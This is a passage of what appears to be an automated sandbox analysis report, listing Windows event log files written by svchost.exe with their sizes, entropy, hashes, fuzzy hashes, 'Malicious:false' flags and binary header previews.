                            MD5:D7FAC000E8F833A09029633F2D80D4F8
                            SHA1:54CAA6333B82E5D3FAB81C8614C971A0258C288D
                            SHA-256:E8A82460CEE168F5FDB02EA5C31E287F42BD9B165DB485F52E4D8CB55FFF16DA
                            SHA-512:03FCECA6B97282BA2D1BFEA3A494AE0E0EA0F1504B322BF931EACC1A3DB4FD7CAA3381EA1B257988DF88C3839D1F2E9D9363897A1CC7D5F8C97053833C74D2D6
                            Malicious:false
                            Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...il.....................................................................k...................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):75880
                            Entropy (8bit):5.700069043094079
                            Encrypted:false
                            SSDEEP:384:Bhka5a29o2KLzyzIz7a5QzuzNz0zxzuewKWMKYa5i0hka5a29o2KLzyzIz7a5Qze:BHk0HkAtWpSFNWuV6PfS7c
                            MD5:16CCF2E39D0F94601315CA4B84A958FA
                            SHA1:1EAB2C9C5BB4B15DAA500F9DCF120C0447C10287
                            SHA-256:BC75B1048966FEDFCBF30DB7715B195B22FE7478D53F9AB1747302C37D2DC891
                            SHA-512:41DC46939F1A741B2A9C4E3D14146165255ED7C4BCC030837B7B75A1B4C78B75A6BEF5D84DA49847B2921C4A1475EB025A098C0FA9FCB3347086D969A7E51425
                            Malicious:false
                            Preview:ElfChnk.A.......C.......A.......C............$..h(...v=........................................................................................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................%..........**......A...........1.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9963080376858662
                            Encrypted:false
                            SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                            MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                            SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                            SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                            SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                            Malicious:false
                            Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.076996627399968
                            Encrypted:false
                            SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                            MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                            SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                            SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                            SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                            Malicious:false
                            Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.224121476511546
                            Encrypted:false
                            SSDEEP:384:ihhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRGj:ihZxGp9b1
                            MD5:9B3B244C997316E5AAF45EE5357F8CB9
                            SHA1:7D7096D753E558A7A78A1BF2C48595AA6FEA4411
                            SHA-256:65242DABB1E89A773F64009609067D8EE68DD749EF4DAB2CDFC69381A588429D
                            SHA-512:C66504634D10769BADED620519A481FE86D08C75EB172967111DD0D0AB71D19DD01381FA6A0CCC0A12F57E77CACA0C3B06150DB765A8F5C38E069C0FF6747640
                            Malicious:false
                            Preview:ElfChnk.T...............T...................P...h....N.U....................................................................Q...........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.801423310886069
                            Encrypted:false
                            SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                            MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                            SHA1:542608204AF6B709B06807E9466F7543C0F08818
                            SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                            SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                            Malicious:false
                            Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.996272372482282
                            Encrypted:false
                            SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                            MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                            SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                            SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                            SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                            Malicious:false
                            Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):224288
                            Entropy (8bit):4.0578208166728915
                            Encrypted:false
                            SSDEEP:6144:KgfRTFgfRqggfRTFgfRq5gfR+EgfRXbgfR6QgfRTFgfRqR:H
                            MD5:DCAEFB4CFE6B5597E2695AE712E2F52C
                            SHA1:DA2755B33D3C77DB2079940CC731FFE2A4786DB5
                            SHA-256:1456AC5A3205834F62C107952CC079610EEF4188C02C66AE2ED9807B09321EEF
                            SHA-512:ADE8BEC992D50812CA2C3570A416AAA2B37E7B7A7F621054A3C1A837DE3650FE714C07BDEA6E76572BAD85197F70361F37B35E0DA490B6552C0715315A20A41E
                            Malicious:false
                            Preview:ElfChnk......................................i.. l..T.......................................................................................... .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................aj..............................................................................&...................................**.. 6..............1.............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.743586753696042
                            Encrypted:false
                            SSDEEP:768:GkN2cTOsKfIPHa4SAdRNlfhvd7NrjzDbRt:OcisgIPQAdRNlfhvd53R
                            MD5:977AF26CE27A3396A72725FBF098FB2F
                            SHA1:D6BCC1A9773B4A28E04298A757BE89325A07817E
                            SHA-256:373BFFB927967A5A8C5B30F9CAD4707946971F64C431877D0101572E7DFD692A
                            SHA-512:72A55A5A41072F32D7FC273FCD2E948949F834E17345F6964BF84963C1B1E6174003E5C52A5D49857701DB62AA9A6B8C617C4C14FB12F38D4880C40213BF20DB
                            Malicious:false
                            Preview:ElfChnk.........................................p............................................................................r..................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.7590316238843728
                            Encrypted:false
                            SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                            MD5:B074238315662886E2BD70106D08A747
                            SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                            SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                            SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                            Malicious:false
                            Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.7511849914008617
                            Encrypted:false
                            SSDEEP:1536:qXhPUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:qX5nS
                            MD5:7C35AE7799444BA51305F08470819182
                            SHA1:69F7281E876D4DDF12172D988F6A689E7B43CE79
                            SHA-256:24FC5B64AD7AACD89BD3111C8402AD478229733A1DC5238ABDA6002590904FC1
                            SHA-512:6725720CE21C9023BF6EF3CDC390095388EF33EE2973FE61DCC934B91750693191F3B680DED871CB38CB27B345F5C38F69FD667E270FD3011C35ADA07F3CB780
                            Malicious:false
                            Preview:ElfChnk.........%...............%............E..`G...X.S....................................................................B.!.................v...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................&B..........O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.3069197485541766
                            Encrypted:false
                            SSDEEP:768:S0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O0apPaQOan6qa6IvV1:ycEu
                            MD5:E6E4C860CE7DD1BB499D6A082B461B90
                            SHA1:11330861B23B1D29D777D9BD10619A07B6A6A9C0
                            SHA-256:C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
                            SHA-512:7393A0FF290BB3DB07E8BB9A9FA7B666CD8B686CBDAA3FED2EBD704D6E88A4D5768D104BD768E6AA533C42588C661A863E11ED9146ABD7386A2A9B4F84583406
                            Malicious:false
                            Preview:ElfChnk.........;...............;............r..@t...H......................................................................p"..................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........................................................................l..............]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:modified
                            Size (bytes):127536
                            Entropy (8bit):4.001162306513506
                            Encrypted:false
                            SSDEEP:768:ah0w+qLpBVi7CPME79nCxkSqDh0w+qLpBVi7CPME79nCxkSqc5:c0w+qtBViW0w+qtBViD5
                            MD5:188278CD4E5CCB184C0D5C5F8AE14E5A
                            SHA1:06549039C676007C26084A2D86C9460F201A1DD6
                            SHA-256:0A93B55EEFDE1A64F92514B5F7FC43B8393E8009633C1E6F5D08FAE20FEB9035
                            SHA-512:99E813233D5753BDE4F01892146763060E6107D6EC9585FA655855825800A3C7A10B0DD21A24DBE8F18D2CC234CD72D3207B73842286B970FF1B4BEC88E129CE
                            Malicious:false
                            Preview:ElfChnk.........#...............#........... ..............................................................................\.*f................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F.......................................-...'...............&.......................................................................................**.. ............#................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2909571978750325
                            Encrypted:false
                            SSDEEP:384:Ny2/hDGCyCkCzCRCFCNClCuC6CoC9rC6CdCsCvCkxCkC5CCCWCxCIC/CbCFC5CkG:Ny2/dm1sR
                            MD5:B0BF4D9EC91ABBDA5D328631B125A5C0
                            SHA1:E672D69127AE7C1A51046ADAA911871EC0C10ABB
                            SHA-256:8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
                            SHA-512:3132E1FCC5C8F88BD974465EA1E644CA89C2D9E041E49F8A1F48B9ACB3376F0A1042F5CB6FDFC6BE2934C4483312C35539D64DB25B892388604F9F637074BCBD
                            Malicious:false
                            Preview:ElfChnk.U.......~.......U.......~....................}/.....................................................................@..................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................v..................................**..0...U.........Df..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.488768580471203
                            Encrypted:false
                            SSDEEP:1536:Q9YcieRoUlafdbkKKMAQ2SomvXCQv/2ketsvQPh8YzSJoh2VgPIEF6uq9GgCVRlW:Q9YcieRoUlaFbkKKMAQ2SomvXCM/2keU
                            MD5:E3FB1708C64D250E4D801AFB8688DF35
                            SHA1:8B889F0358683733257411E451A86E3A1D42159D
                            SHA-256:0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
                            SHA-512:2F5CC514B180A39E5961452A594FE5384A6369CBCB7A1CEBAC37948770A6CB999A2E2F26A32240058D5D7A335904DAF40C88F1C096D8F85907F23E9B32E79ABE
                            Malicious:false
                            Preview:ElfChnk.........$...............$.....................w.........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...................................................V...................................**................o...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.497664742301162
                            Encrypted:false
                            SSDEEP:1536:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqRi/PgTZSXwyvy8fJpfrAW+Cr6SXlUr20G8:9cRFkL1TWX0gkB/J7oasEfyk2/vKlqk0
                            MD5:39D50AC0A6FB19B10351B0B95864C553
                            SHA1:C3226D2043EC640AB3DEB9126CA837BB64C6267A
                            SHA-256:67DD28B8A168FBFC6E3CF184443D299D40E7DA612828E0E1106F57F9BF8CB794
                            SHA-512:345DA4736EEA092AD079D82232DB958C7CBA18B5D96805A81E2A31C7C8D442FE3715BCE5D69764C3AB0F71F94FA9416A3C2A363B228AF1A5A1A4EE9AF3AA9F62
                            Malicious:false
                            Preview:ElfChnk.>...............>...........................=3.z....................................................................6WY ................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................A...............&...i.......~......................**......>........Q.U..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.495116691902589
                            Encrypted:false
                            SSDEEP:384:ShN7s7o787l7r787a7J7z7+7N17g7x7o7g7gY7hZ7D7k7F7r7wm7NP7Y7+7fa7lX:S9HuCg
                            MD5:8F5FACAEC835E59EB086543AA14D1E5D
                            SHA1:9C7A60C39666234A41FCAE59B937DC293D78D89E
                            SHA-256:E6452075DCD968D2B4CC467515B3D7BA3AAF671A5132D6D40B87D1E50E4C876A
                            SHA-512:1D965EA89653B71D11BE8AEF985E718E869D8AAEC6C055F999CDC8A63ACD28FA39E7C4A6979B7D2024F3DE39466296B852279223FBC6935D635F0189E58C0240
                            Malicious:false
                            Preview:ElfChnk.Y.......g.......Y.......g............%...&..J]......................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...........................................=...............&...............................................................s.......................**......Y........................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.1499045494600955
                            Encrypted:false
                            SSDEEP:384:Dhc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauind:D6Ovc0S5UyEeDgLslstY
                            MD5:2045FB0D54CA8F456B545859B9F9B0A8
                            SHA1:35854F87588C367DE32A3931E01BC71535E3F400
                            SHA-256:E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
                            SHA-512:013CAC4CBF67C9AB5D2A07E771BAF81950E5A256F379E3C2E26CC9E8E47379579470CC6FD56E93B31C4D17935713D1FC6026307427D77CBE9647139E3D73AC47
                            Malicious:false
                            Preview:ElfChnk.........;...............;...........xk...m...+.....................................................................F.~.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................6f..w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.8164696340947971
                            Encrypted:false
                            SSDEEP:384:jhGuZumutu4uEu5uOuDuyb2uPu1uRu3uGuHu9/u:jr
                            MD5:1AB19FA472669F4334C7A9D44E94E1B3
                            SHA1:F71C16706CFA9930045C9A888FDB3EF46CACC5BC
                            SHA-256:549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
                            SHA-512:72F1F20CB1F2984B318E4A2AAEE11D573441A77D04C0577D24E19F89E85F1691CB29EF569BD25EBBBD313C7B9DB945DB43D52EEFC2EF33E7BEECDFB8E0BBC404
                            Malicious:false
                            Preview:ElfChnk...................................... ..x$../..........................................................................<................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&....................................................!..................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                            C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                            Download File
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9855903635327656
                            Encrypted:false
                            SSDEEP:384:cxNhPALAb/A0D6AKAlAfyVAQhAQueA4AIAwA0AYAwA+/AfAjrA3DA:cxN90yzXd
